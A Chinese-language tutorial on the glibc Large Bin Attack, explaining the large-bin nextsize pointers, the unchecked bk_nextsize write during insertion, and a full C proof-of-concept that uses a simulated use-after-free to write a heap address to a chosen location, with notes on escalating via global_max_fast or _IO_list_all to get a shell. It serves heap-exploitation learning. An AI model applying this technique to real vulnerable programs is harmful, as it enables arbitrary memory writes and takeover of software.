Large Bin Attack
学习 Large Bin Attack最重要的一点是不要被它的名字吓倒。虽然它属于高级的堆利用技巧但它的本质其实非常简单利用 glibc 在维护“有序双向链表”时缺乏足够的安全检查从而让我们能在一个任意的内存地址里写入一个堆地址。我们先抛开复杂的代码从 Large Bin 这个“仓库”的特殊结构说起。第一步理解 Large Bin 的特殊结构在你之前接触的 Fastbin 或 Unsorted Bin 中一个释放的内存块Chunk只有两个指针fd指向下一个块和bk指向上一个块。它们构成的是普通链表。但是Large Bin 存放的是大于 1024 字节64位系统下的大内存块。为了在分配时能快速找到合适大小的块glibc 对 Large Bin 做了两件事按大小排序最大的 Chunk 放在链表头最小的放在链表尾。增加了两个指针为了加快搜索速度相同大小的 Chunk 会被归为一组。每组的第一个 Chunk除了有fd和bk还多了两个指针fd_nextsize和bk_nextsize。一个完整的 Large Bin Chunk 结构长这样struct malloc_chunk { INTERNAL_SIZE_T mchunk_prev_size; // 前一个chunk的大小 INTERNAL_SIZE_T mchunk_size; // 当前chunk的大小 struct malloc_chunk* fd; // 物理相邻的下一个chunk struct malloc_chunk* bk; // 物理相邻的上一个chunk // 只有 Large Bin 才用到的两个指针 struct malloc_chunk* fd_nextsize; // 指向比当前组稍微小一点的那个组的首个chunk struct malloc_chunk* bk_nextsize; // 指向比当前组稍微大一点的那个组的首个chunk };关键点fd_nextsize和bk_nextsize构成了一个跳表用来在不同大小的 Chunk 之间快速跳转。Large Bin Attack 的核心就是伪造bk_nextsize或bk指针。第二步攻击的触发原理解剖 glibc 源码什么时候会触发 Large Bin Attack答案是当一个 Chunk 从 Unsorted Bin 被放入 Large Bin 时。当你调用malloc申请内存时glibc 会遍历 Unsorted Bin。如果发现里面的 Chunk 大小不满足你的要求就会把它“分类”放到对应的 Bin 中。如果这个 Chunk 很大就会被塞进 Large Bin并且按照大小插入到合适的位置。在 glibc 源码中插入 Large Bin 的操作有这样一段逻辑这里简化了代码只保留致命部分假设victim是我们正要插入的 Chunkfwd是链表中已经存在的、大小比victim大的 Chunk。// 1. 设置 victim 的 nextsize 指针 victim-fd_nextsize fwd; victim-bk_nextsize fwd-bk_nextsize; // 2. 更新原有链表的 nextsize 指针 fwd-bk_nextsize victim; victim-bk_nextsize-fd_nextsize victim; // ---- 【致命漏洞就在这里】**仔细看最后一行代码victim-bk_nextsize-fd_nextsize victim;**如果你能利用某种漏洞比如 Use-After-FreeUAF在victim被插入前修改了原本躺在 Large Bin 里的那个fwd的bk_nextsize指针会发生什么假设我们把fwd-bk_nextsize篡改成Target_Address - 0x20根据代码第一段victim-bk_nextsize变成了Target_Address - 0x20。运行到最后一行时glibc 实际上执行的是(Target_Address - 0x20)-fd_nextsize victim在 Chunk 结构中fd_nextsize的偏移量刚好是0x20。于是代码就变成了Target_Address victim恭喜你成功地在Target_Address这个任意地址写入了victim的堆地址这就是 Large Bin Attack 的终极奥义。第三步手把手实战推演我们用一个具体的场景来走一遍攻击流程。假设现在你有一个 UAF 漏洞可以修改已经被释放的 Chunk 的内容。环境准备你需要伪造出一种特定的堆布局。malloc(0x400)得到 Chunk A。malloc(0x20)得到 Chunk 隔离防止与后面的合并。malloc(0x420)得到 Chunk B 比 A 稍微大一点。malloc(0x20)得到 Chunk 隔离。攻击步骤把 B 放入 Large Bin释放 B进入 Unsorted Bin。然后申请一个比 B 还大的块比如malloc(0x500)。这时glibc 发现 Unsorted Bin 里的 B 不够大就会把它转移到 Large Bin 中。此时Large Bin[ Chunk B ]释放 A 并利用 UAF 篡改 B释放 AA 会进入 Unsorted Bin。关键动作利用你的 UAF 漏洞修改躺在 Large Bin 里的Chunk B 的bk_nextsize指针将其覆盖为你想要攻击的目标地址减去 0x20即Target_Address - 0x20。触发漏洞将 A 插入 Large Bin再次申请一个极大的块比如malloc(0x500)。glibc 发现 Unsorted Bin 里的 A 也不够大于是也要把 A 转移到 Large Bin 里。glibc 开始排序发现 A (0x400) 比 B (0x420) 小决定把 A 插入到 B 的后面。漏洞爆发glibc 乖乖地执行我们上面提到的那段致命代码A-bk_nextsize-fd_nextsize A也就是Target_Address A的堆地址第四步我们能用它来做什么你可能会问“我费了半天劲只能往任意地址写入一个堆的地址又不能写我自定义的数据比如 system 函数这有什么用”这正是 Large Bin Attack 的精妙之处。它通常不作为最后的绝杀而是作为破局的跳板。最经典的用法是劫持global_max_fast变量global_max_fast是 glibc 中的一个全局变量用来限制 Fastbin 的最大尺寸默认通常是 0x80。你可以把Target_Address设为global_max_fast。攻击完成后global_max_fast会被覆盖成一个巨大的堆地址比如0x55xxxxxx。从此之后任何大小的 Chunk 释放后都会被当作 Fastbin 处理然后你就可以愉快地使用非常简单的 Fastbin Attack 来申请任意内存、修改 Got 表、拿到 Shell 了。例子这是一段经典的 C 语言概念验证代码PoC。通过这段代码你可以直观地看到我们是如何利用 UAFUse-After-Free漏洞将一个堆地址写入栈上的局部变量target中的。#include stdio.h #include stdlib.h int main() { // 我们的攻击目标将一个堆地址写入这个普通的局部变量中 size_t target 0; printf(攻击前 target 的值: 0x%zx\n, target); printf(target 变量的内存地址: %p\n, target); // // 第一步布局堆内存 // // 分配一个较大的 Chunk A (0x420) size_t *p1 malloc(0x420); // 分配一个隔离块防止 Chunk A 和 Chunk B 在释放时物理合并 malloc(0x20); // 分配一个稍小的 Chunk B (0x400) size_t *p2 malloc(0x400); // 再次分配隔离块防止 Chunk B 与 Top Chunk 合并 malloc(0x20); // // 第二步将 Chunk A 送入 Large Bin // free(p1); // p1 释放后首先进入 Unsorted Bin malloc(0x500); // 申请一个更大的块。glibc 遍历 Unsorted Bin 发现 p1 不够大 // 于是将其归类放入 Large Bin。 // // 第三步释放 Chunk B准备触发漏洞 // free(p2); // p2 释放后进入 Unsorted Bin // // 第四步漏洞介入利用 UAF 篡改指针 // // 假设程序存在 UAF 漏洞允许我们修改已经释放且躺在 Large Bin 里的 p1 // malloc 返回的用户态指针其索引偏移如下 // p1[0] - fd // p1[1] - bk // p1[2] - fd_nextsize // p1[3] - bk_nextsize // 我们将 p1 的 bk_nextsize 篡改为 target 地址减去 0x20 p1[3] (size_t)target - 0x20; // // 第五步引爆漏洞 // // 再次申请大内存。glibc 遍历 Unsorted Bin发现 p2 也不够大。 // 它试图将 p2 插入到 Large Bin 中 p1 的后面。 // 此时触发致命逻辑p1-bk_nextsize-fd_nextsize p2 // 翻译过来就是(target - 0x20 0x20) p2 的 Chunk 头地址 malloc(0x500); // // 验证结果 // printf(\n攻击后 target 的值: 0x%zx\n, target); // 计算 p2 的 Chunk 头地址 (用户态指针减去 0x10 的头部大小) printf(p2 Chunk 头的真实地址: %p\n, (void*)((char*)p2 - 0x10)); return 0; }核心偏移量解剖为什么是- 0x20在 64 位系统中内存对齐和结构体大小是固定的。这里是新手最容易卡住的地方我们拆解一下 glibc 计算地址的过程Chunk 头部的物理结构prev_size(8 bytes偏移 0x00)size(8 bytes偏移 0x08)fd(8 bytes偏移 0x10)bk(8 bytes偏移 0x18)fd_nextsize(8 bytes偏移0x20)bk_nextsize(8 bytes偏移 0x28)glibc 的执行视角当 glibc 执行到victim-bk_nextsize-fd_nextsize victim;时它在底层其实做的是指针加法计算。它读取了你伪造的bk_nextsize的地址然后强制往后偏移 0x20 个字节也就是fd_nextsize所在的位置把victim也就是 p2的地址写进去。你的攻击视角你希望victim的地址精准落入target变量中。如果你直接写p1[3] targetglibc 会把地址写到target 0x20的地方这就写偏了。所以你要提前减去 0x20补偿这个偏移p1[3] target - 0x20。这样 glibc 的操作就变成了(target - 0x20) 0x20 target。终端运行效果预期编译并运行这段代码你会看到类似如下的输出由于 ASLR每次运行地址会变但相对逻辑是不变的攻击前 target 的值: 0x0 target 变量的内存地址: 0x7ffd5a98b2c8 攻击后 target 的值: 0x55982c7a06a0 p2 Chunk 头的真实地址: 0x55982c7a06a0可以看到target原本是一个毫无威胁的0但在经过一次合法的malloc(0x500)操作后它被 glibc 内部的链表维护机制强行写入了p2的堆地址。如果在实际的漏洞挖掘中你将target替换为global_max_fast或者_IO_list_all等关键的系统底层变量就正式掌控了程序的执行流。

相关新闻

视频素材格式转换:多款视频转换工具能力客观记录

视频素材格式转换:多款视频转换工具能力客观记录

自媒体素材整理、课件转码、监控视频归档时,经常遇到视频格式不兼容、平台上传受限的问题。批量转格式、压缩体积、提取音频、转 GIF,不同工具支持的格式种类、批量上限、编码自定义范围差别较大。下文客观记录多款视频转换工具基础能力与使用边界&#…

2026/9/24 17:52:45 阅读更多 →
教学反思怎么写才不只是感想:四步各留一处能回查的痕迹

教学反思怎么写才不只是感想:四步各留一处能回查的痕迹

一节课上完,随笔写下几行,往往只是当堂的感受;真正立得住的反思,是每一步都留下了一处日后能翻回来核对的凭据。知学术AIPaperGPT 把这条线看得比字数更重。先要一个框架,让免费智能大纲接手;图表这类素材&…

2026/9/24 17:52:45 阅读更多 →
TCP协议栈管理、文件符表映射机制与TCP资源关闭流程介绍

TCP协议栈管理、文件符表映射机制与TCP资源关闭流程介绍

文章目录 一、进程与内核 1.用户态的Java程序进程 2.内核态的操作系统内核 2.1操作系统 2.1.1内核 二、文件描述符与表引用 1.文件描述符 2.文件描述符表 3.引用比例 三、TCP资源管理与连接维护 1.TCP协议栈 1.1TCB 1.1.1端点 1.1.1.1TCP连接状态 四、Socket引用…

2026/9/24 17:52:45 阅读更多 →

最新新闻

基于深度学习的Wiki中文语料Word2Vec词向量模型训练实战与避坑指南

基于深度学习的Wiki中文语料Word2Vec词向量模型训练实战与避坑指南

简介:一套面向自然语言处理初学者的课程设计资源,基于Wiki中文语料,用Python完整实现word2vec向量模型的构建流程,涵盖开发环境准备、数据获取与预处理、中文分词、模型训练与测试等关键环节。压缩包共8个文件,核心为4…

2026/9/24 18:33:19 阅读更多 →
电商系统选型:定制开发与SaaS的博弈,如何做出理性决策

电商系统选型:定制开发与SaaS的博弈,如何做出理性决策

这几年帮不少电商团队做过系统选型评估,几乎每次都会被问到同一个问题:到底是找中博软件开发这类公司做一套定制电商系统,还是直接上主流SaaS厂商的现成方案?这个问题没有标准答案,但选错的代价很大——轻则多花几十万…

2026/9/24 18:33:19 阅读更多 →
Spring Boot整合Redis配置详解:从连接池到序列化避坑指南

Spring Boot整合Redis配置详解:从连接池到序列化避坑指南

1. 先从基础说起:Redis装好了,后面才不会反复折腾 聊到Redis的Spring配置,其实很多问题不是出在Spring代码上,而是Redis基础环境没搭好。我见过不少团队把代码层面排查了个遍,最后发现是本地Redis是Windows老版本&…

2026/9/24 18:33:19 阅读更多 →
MATLAB实现K-means聚类:从原理到可视化全流程解析

MATLAB实现K-means聚类:从原理到可视化全流程解析

简介:K均值聚类是数据分析和机器学习领域最常用的无监督学习算法之一,这份以MATLAB为开发语言的代码包完整演示了多维矩阵聚类与可视化输出的实现过程。压缩包为rar格式,共7个文件,其中5个为.m脚本文件,2个为.mat数据文…

2026/9/24 18:33:19 阅读更多 →
平台工程选型实录:从Railway迁移到自托管Coolify

平台工程选型实录:从Railway迁移到自托管Coolify

选型这件事,我最怕听到的就是“XX平台很好用,大家都用那个”。平台工程本身聊的是交付链路、成本结构、控制边界,这三个东西在不同团队手里权重完全不一样。我最近刚把手里几个项目的部署平台从 Railway 迁走,中间也认真对比过 Re…

2026/9/24 18:33:19 阅读更多 →
MATLAB环境下BP神经网络预测:ANN.m脚本从原理到实战

MATLAB环境下BP神经网络预测:ANN.m脚本从原理到实战

简介:一款基于MATLAB的人工神经网络(ANN)预测源码,面向机器学习初学者、数据科学爱好者及需要开展预测分析的学生和工程师,可用于回归、分类或趋势预测等场景。资源包仅含单个ANN.m文件,压缩后大小1KB&…

2026/9/24 18:32:18 阅读更多 →

日新闻

基于YOLOv8的渔船作业监控系统:从环境搭建到边缘部署全流程

基于YOLOv8的渔船作业监控系统:从环境搭建到边缘部署全流程

简介:这是一套面向计算机、人工智能、自动化等专业学生与教师的毕业设计级项目资源,围绕YOLOv8实现渔船作业监控系统,可用于毕设、课程设计、大作业或项目立项演示。压缩包共97个文件,约24.21MB,以70个Python源码文件为…

2026/9/24 0:00:19 阅读更多 →
单细胞注释实战:基于Scanpy的标记基因与参考映射流程解析

单细胞注释实战:基于Scanpy的标记基因与参考映射流程解析

简介:一份基于单细胞RNA测序数据的细胞类型注释算法研究Python毕业设计源码,针对计算机相关专业正在做毕设或需要项目实战的学习者,可用于课程设计与期末大作业。项目代码完整、经导师指导评审通过,可直接运行,覆盖数据…

2026/9/24 0:00:19 阅读更多 →
C#源生成器实战:用增量生成器替代反射,告别AOT崩溃

C#源生成器实战:用增量生成器替代反射,告别AOT崩溃

第一次在项目里被反射卡住,是在一个老旧的WinForms模块里:几十个类依赖PropertyChanged通知,运行时反射读属性、发通知,每次启动慢半拍不说,一上.NET Native/AOT裁剪模式几乎全面崩盘。后来我把这段逻辑全部改成C#源生…

2026/9/24 0:00:19 阅读更多 →

周新闻

Flutter for OpenHarmony游戏卡片渐变背景实战:从原理到性能优化

Flutter for OpenHarmony游戏卡片渐变背景实战:从原理到性能优化

直接铺开项目本身吧。这几个月我一直在折腾一件事:用Flutter给OpenHarmony做一款游戏集合类的App,说白了就是把若干小游戏塞进一个壳里,用统一入口分发。这个方向本身不算新鲜,真正让我花了不少心思的,是首页那堆游戏卡…

2026/9/24 14:34:13 阅读更多 →
Word表格编号全攻略:从列表编号到题注交叉引用

Word表格编号全攻略:从列表编号到题注交叉引用

写Word文档,最让人头疼的往往是那些“看起来不起眼”的小问题。比如表格编号这事:今天在表后面多加了两个空白行,明天给客户交稿前发现整个章节的编号全部错位,光是挨个改序号就能耗掉大半个下午。我前阵子帮人整理一份上百页的技…

2026/9/24 9:10:42 阅读更多 →
从第一个站到第二个站:独立开发者的静态网站选型与落地实践

从第一个站到第二个站:独立开发者的静态网站选型与落地实践

1. 项目概述1.1 核心需求解析做独立开发者这几年,说实话,第一个网站上线的那天晚上我兴奋得没睡着。但等它跑了半年,流量惨淡、功能臃肿、代码自己都懒得看第二遍之后,我才慢慢琢磨明白一个道理:第一个网站是练手&…

2026/9/24 14:33:56 阅读更多 →

月新闻

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能

持续集成 流水线自动化与 声明式交付 实践:原型怎样变成可用功能分类:[AI/大模型]细分主题:AI 增强型 CI/CD 流水线自动化与 GitOps 实践:Agent 工作流、工具调用与任务拆解:从原型到生产的验收清单很多团队在尝试用大…

2026/9/24 12:50:34 阅读更多 →
容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场

容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场

容器编排 生产环境运维与排障实战:复盘记录怎样真正派上用场分类:[工程技术]细分主题:Kubernetes 生产环境运维与排障实战:可复制的项目复盘模板与决策记录大部分团队的事故复盘报告,最后都变成了躺在 Confluence 或钉…

2026/9/24 14:33:48 阅读更多 →
容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步

容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步

容器 容器化技术与镜像安全管理:核心链路应该先拆哪一步分类:[工程技术]细分主题:Docker 容器化技术与镜像安全管理:核心链路的逐步实现与关键代码取舍面对一个积累了五六年历史包袱的单体架构应用(包含 Web 接口、后台…

2026/9/24 12:49:17 阅读更多 →